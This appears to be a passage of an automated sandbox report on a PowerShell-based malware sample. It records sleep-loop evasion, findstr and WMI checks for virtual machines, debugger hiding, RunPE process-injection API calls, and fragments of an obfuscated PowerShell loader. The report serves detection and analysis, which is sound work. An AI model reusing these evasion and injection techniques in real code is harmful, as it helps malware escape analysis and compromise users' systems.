Source: C:\Windows\System32\svchost.exe API coverage: 8.1 %
Source: C:\Windows\System32\svchost.exe API coverage: 8.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772 Thread sleep count: 4466 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772 Thread sleep count: 5416 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496 Thread sleep count: 3295 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496 Thread sleep count: 2690 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6168 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6408 Thread sleep count: 3663 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768 Thread sleep count: 2339 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7208 Thread sleep count: 282 > 30
Source: C:\Windows\System32\dllhost.exe TID: 7808 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 1196 Thread sleep count: 416 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1196 Thread sleep time: -41600s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5460 Thread sleep count: 366 > 30
Source: C:\Windows\System32\lsass.exe TID: 5460 Thread sleep time: -36600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5904 Thread sleep count: 375 > 30
Source: C:\Windows\System32\svchost.exe TID: 5904 Thread sleep time: -37500s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 5200 Thread sleep count: 182 > 30
Source: C:\Windows\System32\svchost.exe TID: 2832 Thread sleep count: 361 > 30
Source: C:\Windows\System32\svchost.exe TID: 2832 Thread sleep time: -36100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4444 Thread sleep count: 357 > 30
Source: C:\Windows\System32\svchost.exe TID: 4444 Thread sleep time: -35700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8104 Thread sleep count: 351 > 30
Source: C:\Windows\System32\svchost.exe TID: 8104 Thread sleep time: -35100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4840 Thread sleep count: 348 > 30
Source: C:\Windows\System32\svchost.exe TID: 4840 Thread sleep time: -34800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2328 Thread sleep count: 288 > 30
Source: C:\Windows\System32\svchost.exe TID: 8096 Thread sleep count: 323 > 30
Source: C:\Windows\System32\svchost.exe TID: 8096 Thread sleep time: -32300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1992 Thread sleep count: 314 > 30
Source: C:\Windows\System32\svchost.exe TID: 1992 Thread sleep time: -31400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5648 Thread sleep count: 290 > 30
Source: C:\Windows\System32\svchost.exe TID: 6064 Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6064 Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1564 Thread sleep count: 295 > 30
Source: C:\Windows\System32\svchost.exe TID: 3228 Thread sleep count: 295 > 30
Source: C:\Windows\System32\svchost.exe TID: 7252 Thread sleep count: 288 > 30
Source: C:\Windows\System32\svchost.exe TID: 916 Thread sleep count: 284 > 30
Source: C:\Windows\System32\svchost.exe TID: 2292 Thread sleep count: 282 > 30
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B44490D894 FindFirstFileExW, 20_2_000001B44490D894
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B44490DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 20_2_000001B44490DA18
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 40_2_000001C0401CDA18
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401CD894 FindFirstFileExW, 40_2_000001C0401CD894
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401FDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 40_2_000001C0401FDA18
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401FD894 FindFirstFileExW, 40_2_000001C0401FD894
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99175D894 FindFirstFileExW, 41_2_000002E99175D894
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99175DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000002E99175DA18
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99178D894 FindFirstFileExW, 41_2_000002E99178D894
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99178DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000002E99178DA18
Source: C:\Windows\System32\svchost.exe Code function: 43_2_00000158709DD894 FindFirstFileExW, 43_2_00000158709DD894
Source: C:\Windows\System32\svchost.exe Code function: 43_2_00000158709DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 43_2_00000158709DDA18
Source: C:\Windows\System32\svchost.exe Code function: 45_2_000002A3F066D894 FindFirstFileExW, 45_2_000002A3F066D894
Source: C:\Windows\System32\svchost.exe Code function: 45_2_000002A3F066DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 45_2_000002A3F066DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: cmd.exe, 00000013.00000003.1690937685.000001EBD5365000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1699733753.000001EBD5366000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1699263741.000001EBD5366000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: lsass.exe, 0000002A.00000002.2702699224.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxmouse.sys@
Source: powershell.exe, 00000008.00000002.1695772455.00000201D57F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: QEMU HARDDISK
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxsf.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxmouse.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: C:\Program Files\VMware
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxMouse.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxguest.sys@
Source: cmd.exe, 00000013.00000003.1690901511.000001EBD53BD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1691126167.000001EBD53B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1698911244.000001EBD53BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopadkCiysMmhjqykstcChuhrDPRCQvx=esblcks);'.RahNPlsXJhyfvTcQkBWktebzF= (PNNxp (blcALBQNoklYmnvMqIjuKZloxTIro=ktblckrblckeALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingArJZdvjpUptzBxvHvVzmRfwURGQDImiUiFepc=lckablckmblcarQbzXMlQaKmxQdurvXHJDiXfLrQbGJVpZM=t=[string[]]ARTcJFSmRhgHuSEVippzfFGXELhPNfdKWcEyxbe=;Invoke-ExpAryrEiMSvbpMzJYfBAYJTgXlvxSSZldHrVFEo= PNNxp($qgBgAyUllFfCWzKmBQZVLaccuQXnireOSWwpcmWKBmy=tblckrblckebbEqHxaAldzMVZchChAPefbpSXeULFu=.Replace('blBirtiNrHVYDUNOfnuwezvYlMeMCKv=stem.SecuritBjgLdjxLERRreRJOdBgCGHmjbhPayNZRJLtkQ=kSblckyblcksBjNaUJYFtDDvZOpjtVkkwMoujNYFxlirOvdn=rity.CryptogBjODtptiZVMnhNLphWGYLOGXSfg=blckoblckrblBlMwEAfmtMEkQJBhANdInPMKsfWGdzs=ckrblckyblckBwMSuWUxrcTzMwozeerirEuWggRE=.blckMblckebbWqwEcnSQuVPbgzZIJhpj='blck', '');BWTJwdXgkYrcJpKhsjetHrudPEdUWIhjstyHx=$BZwPR=[SystBwVSeyAtSDInBjVCzGYmiwZJzkKTSwkHCUgRSOz=$host.UI.RawbxsqEpkJRPGjAbsGsFwnyOiXVgw=blckBblckablcCOSJSjaMRRokVhPLqsQzLlRqUPu=Expression 'CCVdyswDTorbNVRsRbdOSu=.MblckeblckmCdIvahXCUGViOpDUSnzHcN=gJbXPg
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmmouse.sys@
Source: powershell.exe, 00000008.00000002.1695772455.00000201D580A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemuwmi2B
Source: lsass.exe, 0000002A.00000000.2197017200.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2697105263.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 0000002A.00000002.2702699224.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: powershell.exe, 00000008.00000002.1695772455.00000201D580A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmusrvc2B
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: c:\program files\vmware@
Source: powershell.exe, 00000008.00000002.1695772455.00000201D59BB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $Hyper-V Time Synchronization Service
Source: lsass.exe, 0000002A.00000002.2702699224.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxsf.sys@
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: lsass.exe, 0000002A.00000002.2702699224.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxSF.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxguest.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: !Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: cmd.exe, 00000013.00000003.1682676692.000001EBD5365000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1690176573.000001EBD5366000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1690012290.000001EBD5366000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B1036CD rdtsc 38_2_00007FFB4B1036CD
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B4449084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000001B4449084B0
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B444901E3C LoadLibraryA,GetProcAddress,SleepEx, 20_2_000001B444901E3C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B444901000 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc, 20_2_000001B444901000
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B444908814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_000001B444908814
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B4449084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000001B4449084B0
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B44490CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000001B44490CD80
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 40_2_000001C0401C8814
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_000001C0401C84B0
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_000001C0401CCD80
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401F8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 40_2_000001C0401F8814
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401F84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_000001C0401F84B0
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401FCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_000001C0401FCD80
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E991758814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 41_2_000002E991758814
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99175CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000002E99175CD80
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E9917584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000002E9917584B0
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E991788814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 41_2_000002E991788814
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99178CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000002E99178CD80
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E9917884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000002E9917884B0
Source: C:\Windows\System32\svchost.exe Code function: 43_2_00000158709D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 43_2_00000158709D8814
Source: C:\Windows\System32\svchost.exe Code function: 43_2_00000158709D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 43_2_00000158709D84B0
Source: C:\Windows\System32\svchost.exe Code function: 43_2_00000158709DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 43_2_00000158709DCD80
Source: C:\Windows\System32\svchost.exe Code function: 45_2_000002A3F0668814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 45_2_000002A3F0668814
Source: C:\Windows\System32\svchost.exe Code function: 45_2_000002A3F06684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_000002A3F06684B0
Source: C:\Windows\System32\svchost.exe Code function: 45_2_000002A3F066CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_000002A3F066CD80

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code contains process injector
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 38.2.powershell.exe.1a3a6b20000.15.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 38.2.powershell.exe.1a39e603b88.11.raw.unpack, RunPE.cs .Net Code: Run contains injection code
.NET source code references suspicious native API functions
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
